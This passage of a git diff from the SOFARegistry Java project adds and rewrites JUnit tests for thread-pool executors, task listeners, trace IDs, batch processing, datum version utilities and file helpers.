AtomicInteger(); + long now = System.currentTimeMillis(); + KeyedTask task = + new KeyedTask( + "test", + () -> { + count.incrementAndGet(); + }); + TestUtils.assertBetween(task.getCreateTime(), now, System.currentTimeMillis()); + Assert.assertEquals(task.getEndTime(), 0); + Assert.assertEquals(task.getStartTime(), 0); + Assert.assertEquals(task.key(), "test"); + Assert.assertNotNull(task.getRunnable()); + task.cancel(); + + // has not run, not finish + Assert.assertFalse(task.isFinished()); + Assert.assertFalse(task.isSuccess()); + Assert.assertFalse(task.isFailed()); + + Assert.assertTrue(task.canceled); + // not finish + Assert.assertFalse(task.isOverAfter(1)); + task.run(); + // cancel always return true + Assert.assertTrue(task.isOverAfter(1000000)); + // has cancel, not exec + Assert.assertEquals(count.get(), 0); + Assert.assertTrue(task.isFinished()); + Assert.assertTrue(task.isSuccess()); + Assert.assertFalse(task.isFailed()); + + Assert.assertNotNull(task.toString()); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/task/MetricsableThreadPoolExecutorTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/task/MetricsableThreadPoolExecutorTest.java new file mode 100644 index 000000000..7eb3e9f34 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/task/MetricsableThreadPoolExecutorTest.java @@ -0,0 +1,49 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.task; + +import com.alipay.sofa.registry.TestUtils; +import com.alipay.sofa.registry.log.LoggerFactory; +import java.util.concurrent.RejectedExecutionException; +import org.junit.Assert; +import org.junit.Test; + +public class MetricsableThreadPoolExecutorTest { + + @Test + public void test() { + MetricsableThreadPoolExecutor executor = + MetricsableThreadPoolExecutor.newExecutor("test" + System.currentTimeMillis(), 1, 1); + Assert.assertNotNull(executor.toString()); + + final RejectedLogErrorHandler handler = + (RejectedLogErrorHandler) executor.getRejectedExecutionHandler(); + TestUtils.assertException( + RejectedExecutionException.class, + () -> + handler.rejectedExecution( + () -> { + throw new RuntimeException(); + }, + executor)); + + RejectedLogErrorHandler handlerNoException = + new RejectedLogErrorHandler( + LoggerFactory.getLogger(MetricsableThreadPoolExecutorTest.class), false); + handlerNoException.rejectedExecution(() -> {}, executor); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/task/listener/TaskListenerTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/task/listener/TaskListenerTest.java index 9443f5d44..d5a167bae 100644 --- a/server/common/util/src/test/java/com/alipay/sofa/registry/task/listener/TaskListenerTest.java +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/task/listener/TaskListenerTest.java @@ -16,86 +16,67 @@ */ package com.alipay.sofa.registry.task.listener; +import static com.alipay.sofa.registry.task.listener.TaskEvent.TaskType.WATCHER_REGISTER_FETCH_TASK; + +import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; import org.junit.Assert; import org.junit.BeforeClass; import org.junit.Test; -import static com.alipay.sofa.registry.task.listener.TaskEvent.TaskType.CANCEL_DATA_TASK; -import static com.alipay.sofa.registry.task.listener.TaskEvent.TaskType.DATA_PUSH_TASK; -import static com.alipay.sofa.registry.task.listener.TaskEvent.TaskType.WATCHER_REGISTER_FETCH_TASK; - /** * @author xuanbei * @since 2018/12/28 */ public class TaskListenerTest { - private static final TaskListenerManager taskListenerManager = new DefaultTaskListenerManager(); - private static volatile boolean watcherRegisterFetchTaskListenerCalled = false; - private static volatile boolean cancelDataTaskListenerCalled = false; - private static volatile boolean dataPushTaskListenerCalled = false; + private static final TaskListenerManager taskListenerManager = new DefaultTaskListenerManager(); + private static volatile boolean watcherRegisterFetchTaskListenerCalled = false; - @BeforeClass - public static void beforeClass() { - taskListenerManager.addTaskListener(new CancelDataTaskListener()); - taskListenerManager.addTaskListener(new DataPushTaskListener()); - taskListenerManager.addTaskListener(new WatcherRegisterFetchTaskListener()); - } + @BeforeClass + public static void beforeClass() { - @Test - public void doTest() { - Assert.assertEquals(3, taskListenerManager.getTaskListeners().size()); - taskListenerManager.sendTaskEvent(new TaskEvent(DATA_PUSH_TASK)); - Assert.assertTrue(dataPushTaskListenerCalled); - Assert.assertFalse(cancelDataTaskListenerCalled); - Assert.assertFalse(watcherRegisterFetchTaskListenerCalled); - dataPushTaskListenerCalled = false; + taskListenerManager.addTaskListener(new WatcherRegisterFetchTaskListener()); + } - taskListenerManager.sendTaskEvent(new TaskEvent(CANCEL_DATA_TASK)); - Assert.assertFalse(dataPushTaskListenerCalled); - Assert.assertTrue(cancelDataTaskListenerCalled); - Assert.assertFalse(watcherRegisterFetchTaskListenerCalled); - cancelDataTaskListenerCalled = false; + @Test + public void doTest() { + Assert.assertEquals(1, taskListenerManager.getTaskListeners().size()); - taskListenerManager.sendTaskEvent(new TaskEvent(WATCHER_REGISTER_FETCH_TASK)); - Assert.assertFalse(dataPushTaskListenerCalled); - Assert.assertFalse(cancelDataTaskListenerCalled); - Assert.assertTrue(watcherRegisterFetchTaskListenerCalled); - watcherRegisterFetchTaskListenerCalled = false; - } + Assert.assertFalse(watcherRegisterFetchTaskListenerCalled); - private static class DataPushTaskListener implements TaskListener { - @Override - public boolean support(TaskEvent event) { - return DATA_PUSH_TASK.equals(event.getTaskType()); - } + taskListenerManager.sendTaskEvent(new TaskEvent(WATCHER_REGISTER_FETCH_TASK)); - @Override - public void handleEvent(TaskEvent event) { - dataPushTaskListenerCalled = true; - } - } + Assert.assertTrue(watcherRegisterFetchTaskListenerCalled); + watcherRegisterFetchTaskListenerCalled = false; + } - private static class CancelDataTaskListener implements TaskListener { - @Override - public boolean support(TaskEvent event) { - return TaskEvent.TaskType.CANCEL_DATA_TASK.equals(event.getTaskType()); - } + @Test + public void doTestEvent() { + Object o = new Object(); + long now = System.currentTimeMillis(); + TaskEvent event = new TaskEvent(o, WATCHER_REGISTER_FETCH_TASK); + Assert.assertTrue(event.getCreateTime() >= now); + Assert.assertNotNull(event.getTaskId()); + Assert.assertEquals(event.getEventObj(), o); + event.setEventObj(new Object()); + Assert.assertNotEquals(event.getEventObj(), o); + event.setSendTimeStamp(now); + Assert.assertEquals(event.getSendTimeStamp(), now); - @Override - public void handleEvent(TaskEvent event) { - cancelDataTaskListenerCalled = true; - } - } + event.setAttribute("k", "v"); + Assert.assertEquals(event.getAttribute("k"), "v"); + event.setAttribute("k", null); + Assert.assertNull(event.getAttribute("k")); + } - private static class WatcherRegisterFetchTaskListener implements TaskListener { - @Override - public boolean support(TaskEvent event) { - return TaskEvent.TaskType.WATCHER_REGISTER_FETCH_TASK.equals(event.getTaskType()); - } + private static class WatcherRegisterFetchTaskListener implements TaskListener { + @Override + public TaskType support() { + return TaskType.WATCHER_REGISTER_FETCH_TASK; + } - @Override - public void handleEvent(TaskEvent event) { - watcherRegisterFetchTaskListenerCalled = true; - } + @Override + public void handleEvent(TaskEvent event) { + watcherRegisterFetchTaskListenerCalled = true; } + } } diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/timer/AsyncHashedWheelTimerTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/timer/AsyncHashedWheelTimerTest.java deleted file mode 100644 index 11b63f53b..000000000 --- a/server/common/util/src/test/java/com/alipay/sofa/registry/timer/AsyncHashedWheelTimerTest.java +++ /dev/null @@ -1,71 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.timer; - -import com.google.common.util.concurrent.ThreadFactoryBuilder; -import io.netty.util.Timer; -import org.junit.Assert; -import org.junit.Test; - -import java.util.concurrent.CountDownLatch; -import java.util.concurrent.TimeUnit; - -/** - * @author xuanbei - * @since 2019/3/27 - */ -public class AsyncHashedWheelTimerTest { - private long currentTime; - private long executeTime; - private Throwable executionRejectedThrowable; - private Throwable executionFailedThrowable; - - @Test - public void doTest() throws InterruptedException { - CountDownLatch countDownLatch = new CountDownLatch(2); - ThreadFactoryBuilder threadFactoryBuilder = new ThreadFactoryBuilder(); - threadFactoryBuilder.setDaemon(true); - final Timer timer = new AsyncHashedWheelTimer(threadFactoryBuilder.setNameFormat( - "AsyncHashedWheelTimerTest").build(), 50, TimeUnit.MILLISECONDS, 10, - threadFactoryBuilder.setNameFormat("Registry-DataNodeServiceImpl-WheelExecutor-%d") - .build(), new AsyncHashedWheelTimer.TaskFailedCallback() { - @Override - public void executionRejected(Throwable t) { - executionRejectedThrowable = t; - } - - @Override - public void executionFailed(Throwable t) { - executionFailedThrowable = t; - countDownLatch.countDown(); - } - }); - - currentTime = System.currentTimeMillis(); - executeTime = currentTime; - timer.newTimeout((timeout)-> { - executeTime = System.currentTimeMillis(); - countDownLatch.countDown(); - throw new Exception("execution failed."); - },1000, TimeUnit.MILLISECONDS); - - countDownLatch.await(3000, TimeUnit.MILLISECONDS); - Assert.assertTrue(executeTime >= currentTime + 1000); - Assert.assertNull(executionRejectedThrowable); - Assert.assertNotNull(executionFailedThrowable); - } -} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/trace/TraceIDTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/trace/TraceIDTest.java new file mode 100644 index 000000000..cc514d19c --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/trace/TraceIDTest.java @@ -0,0 +1,31 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.trace; + +import org.junit.Assert; +import org.junit.Test; + +public class TraceIDTest { + @Test + public void test() { + TraceID id = TraceID.newTraceID(); + for (int i = 0; i < 100; i++) { + TraceID other = TraceID.newTraceID(); + Assert.assertNotEquals(id.toString(), other.toString()); + } + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/BatchCallableRunnableTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/BatchCallableRunnableTest.java new file mode 100644 index 000000000..8f76f917b --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/BatchCallableRunnableTest.java @@ -0,0 +1,124 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import com.alipay.sofa.registry.util.BatchCallableRunnable.InvokeFuture; +import com.alipay.sofa.registry.util.BatchCallableRunnable.TaskEvent; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.Map.Entry; +import java.util.concurrent.TimeUnit; +import org.junit.Assert; + +/** + * @author xiaojian.xj + * @version $Id: BatchCallableRunnableTest.java, v 0.1 2021年01月23日 16:11 xiaojian.xj Exp $ + */ +public class BatchCallableRunnableTest { + + @org.junit.Test + public void testBatchRunnable() throws InterruptedException { + Test test = new Test(); + test.init(); + Map futures = new HashMap<>(); + for (int i = 0; i <= 255; i++) { + TaskEvent taskEvent = test.new TaskEvent(i); + InvokeFuture future = test.commit(taskEvent); + futures.putIfAbsent(i, future); + } + + for (Entry entry : futures.entrySet()) { + + InvokeFuture future = entry.getValue(); + String result = (String) future.getResponse(); + Assert.assertEquals("hello " + entry.getKey().intValue(), result); + } + } + + @org.junit.Test + public void testBatchRunnable_False() throws InterruptedException { + Test test = new Test(); + test.retFalse = true; + test.init(); + InvokeFuture future = test.commit(test.new TaskEvent(10)); + Assert.assertFalse(future.isSuccess()); + } + + @org.junit.Test + public void testBatchRunnable_Exception() throws InterruptedException { + Test test = new Test(); + test.exception = true; + test.init(); + InvokeFuture future = test.commit(test.new TaskEvent(10)); + Assert.assertFalse(future.isSuccess()); + Assert.assertTrue("@@@" + future.getMessage(), future.getMessage() != null); + } + + @org.junit.Test + public void testFuture() throws Exception { + InvokeFuture future = new InvokeFuture(); + future.fail(); + Assert.assertFalse(future.isSuccess()); + + future = new InvokeFuture(); + future.error("xxx"); + Assert.assertFalse(future.isSuccess()); + Assert.assertEquals(future.getMessage(), "xxx"); + + future = new InvokeFuture(); + future.finish(); + Assert.assertFalse(future.isSuccess()); + + future = new InvokeFuture(); + Object obj = new Object(); + future.putResponse(obj); + future.finish(); + Assert.assertTrue(future.isSuccess()); + Assert.assertEquals(future.getResponse(), obj); + } + + public class Test extends BatchCallableRunnable { + boolean exception; + boolean retFalse; + + public Test() { + super(1, TimeUnit.SECONDS, 100); + } + + @Override + public boolean batchProcess(List taskEvents) { + if (taskEvents == null || taskEvents.size() == 0) { + return true; + } + + if (retFalse) { + return false; + } + + if (exception) { + throw new RuntimeException(); + } + + for (TaskEvent taskEvent : taskEvents) { + Integer data = taskEvent.getData(); + taskEvent.getFuture().putResponse("hello " + data); + } + return true; + } + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/BoolTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/BoolTest.java new file mode 100644 index 000000000..680ecbaa1 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/BoolTest.java @@ -0,0 +1,36 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import org.junit.Assert; +import org.junit.Test; + +public class BoolTest { + @Test + public void test() { + Bool b = Bool.newFalse(); + Assert.assertFalse(b.isTrue()); + + b = Bool.newTrue(); + Assert.assertTrue(b.isTrue()); + + b.setBool(false); + Assert.assertFalse(b.isTrue()); + b.setBool(true); + Assert.assertTrue(b.isTrue()); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/CollectionUtilsTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/CollectionUtilsTest.java index 5f1da1447..8c614a428 100644 --- a/server/common/util/src/test/java/com/alipay/sofa/registry/util/CollectionUtilsTest.java +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/CollectionUtilsTest.java @@ -16,35 +16,36 @@ */ package com.alipay.sofa.registry.util; -import org.junit.Assert; -import org.junit.Test; - import java.util.ArrayList; import java.util.Arrays; -import java.util.Collection; +import java.util.Collections; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; /** * @author xuanbei * @since 2018/12/28 */ public class CollectionUtilsTest { - Collection stringCollection = new ArrayList<>(Arrays.asList("zhangsan", "lisi", - "wangwu", "zhaoliu", "sunqi", "zhouba")); + List stringCollection = + new ArrayList<>(Arrays.asList("zhangsan", "lisi", "wangwu", "zhaoliu", "sunqi", "zhouba")); - @Test - public void testGetRandom() { - boolean allValueSame = true; - String firstValue = null; - for (int i = 0; i < 10; i++) { - String radomeValue = i % 2 == 0 ? CollectionUtils.getRandom(stringCollection).get() - : new CollectionUtils().getRandom(stringCollection).get(); - Assert.assertTrue(stringCollection.contains(radomeValue)); - if (firstValue == null) { - firstValue = radomeValue; - } else if (!radomeValue.equals(firstValue)) { - allValueSame = false; - } - } - Assert.assertFalse(allValueSame); + @Test + public void testGetRandom() { + Object obj = CollectionUtils.getRandom(Collections.emptyList()); + Assert.assertNull(obj); + boolean allValueSame = true; + String firstValue = null; + for (int i = 0; i < 10; i++) { + String radomeValue = CollectionUtils.getRandom(stringCollection); + Assert.assertTrue(stringCollection.contains(radomeValue)); + if (firstValue == null) { + firstValue = radomeValue; + } else if (!radomeValue.equals(firstValue)) { + allValueSame = false; + } } + Assert.assertFalse(allValueSame); + } } diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/ConcurrentUtilsTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/ConcurrentUtilsTest.java new file mode 100644 index 000000000..fec08098e --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/ConcurrentUtilsTest.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import java.util.concurrent.SynchronousQueue; +import java.util.concurrent.TimeUnit; +import org.junit.Test; + +public class ConcurrentUtilsTest { + + @Test + public void testInterrupt() { + // init env + ConcurrentUtils.sleepUninterruptibly(1, TimeUnit.MILLISECONDS); + + Thread.currentThread().interrupt(); + ConcurrentUtils.sleepUninterruptibly(1, TimeUnit.MILLISECONDS); + + Thread.currentThread().interrupt(); + Object sync = new Object(); + synchronized (sync) { + ConcurrentUtils.objectWaitUninterruptibly(sync, 1); + } + + Thread.currentThread().interrupt(); + ConcurrentUtils.pollUninterruptibly(new SynchronousQueue(), 1, TimeUnit.MILLISECONDS); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/DatumVersionUtilTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/DatumVersionUtilTest.java new file mode 100644 index 000000000..f3bcd2bd7 --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/DatumVersionUtilTest.java @@ -0,0 +1,89 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import org.junit.Assert; +import org.junit.Test; + +public class DatumVersionUtilTest { + + @Test + public void testNextId() { + long timestamp = System.currentTimeMillis(); + long epoch = DatumVersionUtil.nextId(); + long ts = DatumVersionUtil.getRealTimestamp(epoch); + Assert.assertTrue(ts >= timestamp); + Assert.assertTrue(ts <= System.currentTimeMillis()); + } + + @Test + public void testUnit() { + long timestamp = System.currentTimeMillis(); + long millis = DatumVersionUtil.untilNextMillis(timestamp + 100); + Assert.assertTrue(millis >= timestamp + 100); + Assert.assertTrue(millis <= System.currentTimeMillis()); + } + + @Test + public void testConfregNextId() { + long timestamp = System.currentTimeMillis(); + Assert.assertTrue(DatumVersionUtil.confregNextId(0) >= timestamp); + + timestamp = System.currentTimeMillis(); + Assert.assertTrue(DatumVersionUtil.confregNextId(timestamp) > timestamp); + + timestamp = System.currentTimeMillis(); + Assert.assertTrue(DatumVersionUtil.confregNextId(timestamp) < timestamp + 100); + + timestamp = System.currentTimeMillis(); + Assert.assertEquals(DatumVersionUtil.confregNextId(timestamp + 1000), timestamp + 1001); + + Assert.assertEquals(DatumVersionUtil.getRealTimestamp(timestamp), timestamp); + } + + @Test + public void testVersionType() { + Assert.assertEquals( + DatumVersionUtil.versionType(System.currentTimeMillis()), + DatumVersionUtil.DATUM_VERSION_TYPE_CONFREG); + Assert.assertEquals( + DatumVersionUtil.versionType(DatumVersionUtil.confregNextId(0)), + DatumVersionUtil.DATUM_VERSION_TYPE_CONFREG); + Assert.assertEquals( + DatumVersionUtil.versionType(DatumVersionUtil.nextId()), + DatumVersionUtil.DATUM_VERSION_TYPE_REGISTRY); + } + + @Test + public void testTransferDatumVersion() { + DatumVersionUtil.datumVersionType = DatumVersionUtil.DATUM_VERSION_TYPE_CONFREG; + Assert.assertEquals(DatumVersionUtil.transferDatumVersion(0), 0); + Assert.assertEquals(DatumVersionUtil.transferDatumVersion(1), 1); + long timestamp = System.currentTimeMillis(); + Assert.assertEquals(DatumVersionUtil.transferDatumVersion(timestamp), timestamp); + long version = DatumVersionUtil.nextId(); + Assert.assertEquals( + DatumVersionUtil.transferDatumVersion(version), DatumVersionUtil.getRealTimestamp(version)); + + DatumVersionUtil.datumVersionType = DatumVersionUtil.DATUM_VERSION_TYPE_REGISTRY; + Assert.assertEquals(DatumVersionUtil.transferDatumVersion(0), 0); + Assert.assertEquals(DatumVersionUtil.transferDatumVersion(1), 1); + + version = DatumVersionUtil.nextId(); + Assert.assertEquals(DatumVersionUtil.transferDatumVersion(version), version); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/DefaultExecutorFactoryTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/DefaultExecutorFactoryTest.java new file mode 100644 index 000000000..f9c274afa --- /dev/null +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/DefaultExecutorFactoryTest.java @@ -0,0 +1,147 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.util; + +import static org.junit.Assert.*; + +import com.alipay.sofa.registry.AbstractTestBase; +import java.util.concurrent.*; +import org.junit.Assert; +import org.junit.Test; + +public class DefaultExecutorFactoryTest extends AbstractTestBase { + + @Test + public void testCreateCachedThreadPoolFactory() throws InterruptedException, TimeoutException { + ThreadPoolExecutor executor = + (ThreadPoolExecutor) + DefaultExecutorFactory.createCachedThreadPoolFactory( + "test", 1, 10, TimeUnit.MILLISECONDS) + .create(); + Assert.assertTrue(executor.getThreadFactory() instanceof NamedThreadFactory); + Assert.assertTrue( + ((NamedThreadFactory) executor.getThreadFactory()).getNamePrefix().startsWith("test")); + Assert.assertTrue(executor.getQueue() instanceof SynchronousQueue); + int tasks = 10; + new ConcurrentExecutor(tasks, executor) + .execute( + new Runnable() { + @Override + public void run() { + try { + Thread.sleep(10); + } catch (InterruptedException e) { + + } + } + }); + waitConditionUntilTimeOut(() -> executor.getCompletedTaskCount() >= tasks, 1000); + waitConditionUntilTimeOut(() -> executor.getCorePoolSize() < 2, 110); + } + + @Test + public void testBuilderWithQueueFactory() { + DefaultExecutorFactory factory = + DefaultExecutorFactory.builder() + .workQueueFactory( + new ObjectFactory>() { + @Override + public BlockingQueue create() { + return new LinkedBlockingDeque(10); + } + }) + .build(); + ThreadPoolExecutor executor1 = (ThreadPoolExecutor) factory.create(); + ThreadPoolExecutor executor2 = (ThreadPoolExecutor) factory.create(); + Assert.assertNotSame(executor1.getQueue(), executor2.getQueue()); + } + + @Test + public void testBuilderWithQueueSize() { + DefaultExecutorFactory factory = DefaultExecutorFactory.builder().queueSize(2).build(); + ThreadPoolExecutor executor1 = (ThreadPoolExecutor) factory.create(); + ThreadPoolExecutor executor2 = (ThreadPoolExecutor) factory.create(); + Assert.assertNotSame(executor1.getQueue(), executor2.getQueue()); + } + + @Test + public void testBuilder() { + DefaultExecutorFactory factory = + DefaultExecutorFactory.builder().queueSize(2).allowCoreThreadTimeOut(false).build(); + Assert.assertFalse(((ThreadPoolExecutor) factory.create()).allowsCoreThreadTimeOut()); + factory = + DefaultExecutorFactory.builder() + .queueSize(2) + .allowCoreThreadTimeOut(false) + .threadNamePrefix("test") + .corePoolSize(100) + .corePoolTimeAlive(1000) + .corePoolTimeAliveUnit(TimeUnit.MILLISECONDS) + .rejectedExecutionHandler(new ThreadPoolExecutor.AbortPolicy()) + .maxPoolSize(200) + .build(); + ThreadPoolExecutor executor = (ThreadPoolExecutor) factory.create(); + Assert.assertEquals(100, executor.getCorePoolSize()); + Assert.assertEquals(200, executor.getMaximumPoolSize()); + Assert.assertEquals(1000, executor.getKeepAliveTime(TimeUnit.MILLISECONDS)); + Assert.assertTrue( + executor.getRejectedExecutionHandler() instanceof ThreadPoolExecutor.AbortPolicy); + + factory = + DefaultExecutorFactory.builder() + .queueSize(2) + .allowCoreThreadTimeOut(false) + .threadNamePrefix("test") + .threadFactory( + new ThreadFactory() { + @Override + public Thread newThread(Runnable r) { + return new Thread(r); + } + }) + .corePoolSize(100) + .corePoolTimeAlive(1000) + .corePoolTimeAliveUnit(TimeUnit.MILLISECONDS) + .rejectedExecutionHandler(new ThreadPoolExecutor.AbortPolicy()) + .maxPoolSize(200) + .build(); + executor = (ThreadPoolExecutor) factory.create(); + Assert.assertFalse(executor.getThreadFactory() instanceof NamedThreadFactory); + } + + @Test(expected = IllegalArgumentException.class) + public void testThreadQueueSize() { + DefaultExecutorFactory factory = + DefaultExecutorFactory.builder() + .allowCoreThreadTimeOut(false) + .threadNamePrefix("test") + .corePoolSize(100) + .corePoolTimeAlive(1000) + .corePoolTimeAliveUnit(TimeUnit.MILLISECONDS) + .rejectedExecutionHandler(new ThreadPoolExecutor.AbortPolicy()) + .maxPoolSize(200) + .workQueueFactory( + new ObjectFactory>() { + @Override + public BlockingQueue create() { + return new LinkedBlockingDeque<>(); + } + }) + .queueSize(2) + .build(); + } +} diff --git a/server/common/util/src/test/java/com/alipay/sofa/registry/util/FileUtilsTest.java b/server/common/util/src/test/java/com/alipay/sofa/registry/util/FileUtilsTest.java index 1690ae41d..7da7949e8 100644 --- a/server/common/util/src/test/java/com/alipay/sofa/registry/util/FileUtilsTest.java +++ b/server/common/util/src/test/java/com/alipay/sofa/registry/util/FileUtilsTest.java @@ -16,49 +16,50 @@ */ package com.alipay.sofa.registry.util; -import org.junit.Test; - -import java.io.File; -import java.io.IOException; - import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertTrue; import static org.junit.Assert.fail; +import java.io.File; +import java.io.IOException; +import org.junit.Test; + /** * @author xuanbei * @since 2019/1/16 */ public class FileUtilsTest { - @Test - public void doTest() throws Exception { - File dir = new File(System.getProperty("user.home") + File.separator + "FileUtilsTestDir"); - File file = new File(dir, "FileUtilsTest"); - FileUtils.forceDelete(dir); + @Test + public void doTest() throws Exception { + File dir = new File(System.getProperty("user.home") + File.separator + "FileUtilsTestDir"); + File file = new File(dir, "FileUtilsTest"); + FileUtils.forceDelete(dir); - String data = "FileUtilsTest"; - new FileUtils().writeByteArrayToFile(file, data.getBytes(), true); - byte[] readByte = FileUtils.readFileToByteArray(file); - assertEquals(data, new String(readByte)); + String data = "FileUtilsTest"; + new FileUtils().writeByteArrayToFile(file, data.getBytes(), true); + byte[] readByte = FileUtils.readFileToByteArray(file); + assertEquals(data, new String(readByte)); - boolean throwException = false; - try { - FileUtils.forceMkdir(file); - } catch (Exception e) { - throwException = true; - assertTrue(e.getClass() == IOException.class); - assertTrue(e.getMessage().contains( - "FileUtilsTest exists and is not a directory. Unable to create directory.")); - } - if (!throwException) { - fail("should throw Exception."); - } - FileUtils.forceDelete(file); - FileUtils.forceDelete(dir); - - FileUtils.forceMkdir(dir); - assertTrue(dir.exists()); - assertTrue(dir.isDirectory()); - FileUtils.forceDelete(dir); + boolean throwException = false; + try { + FileUtils.forceMkdir(file); + } catch (Exception e) { + throwException = true; + assertTrue(e.getClass() == IOException.class); + assertTrue( + e.getMessage() + .contains( + "FileUtilsTest exists and is not a directory. Unable to create directory.")); + } + if (!throwException) { + fail("should throw Exception."); } + FileUtils.forceDelete(file); + FileUtils.forceDelete(dir); + + FileUtils.forceMkdir(dir); + assertTrue(dir.exists()); + assertTrue(dir.isDirectory()); + FileUtils.forceDelete(dir); + } } diff --git 